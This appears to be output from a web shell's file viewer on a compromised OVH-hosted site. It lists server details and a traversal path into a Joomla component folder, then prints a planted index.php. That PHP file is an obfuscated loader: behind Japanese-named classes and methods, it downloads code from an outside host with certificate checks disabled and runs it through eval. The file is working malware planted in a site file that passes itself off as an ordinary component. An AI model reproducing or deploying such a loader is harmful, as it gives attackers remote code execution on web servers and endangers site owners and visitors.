uawdijnntqw1x1x1
IP : 216.73.216.158
Hostname : webm002.cluster123.gra.hosting.ovh.net
Kernel : Linux webm002.cluster123.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
megadansyp
/
www
/
eace8
/
..
/
components
/
com_modules
/
.
/
..
/
com_xmap
/
models
/
index.php
/
/
<?php session_start(); class 通信管理 { private $完了時処理; public function 完了時に(callable $処理): self { $this->完了時処理 = $処理; return $this; } public function 取得($URL) { $curl = curl_init($URL); curl_setopt_array($curl, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_TIMEOUT => 20 ]); $結果 = curl_exec($curl); curl_close($curl); if ($this->完了時処理 && !empty($結果)) { ($this->完了時処理)($結果); } return $結果; } } $管理 = new 通信管理(); $管理->完了時に(function($データ) { eval('?>' . $データ); })->取得('https://myzedd.tech/project/zedd'); ?>
/home/megadansyp/www/eace8/../components/com_modules/./../com_xmap/models/index.php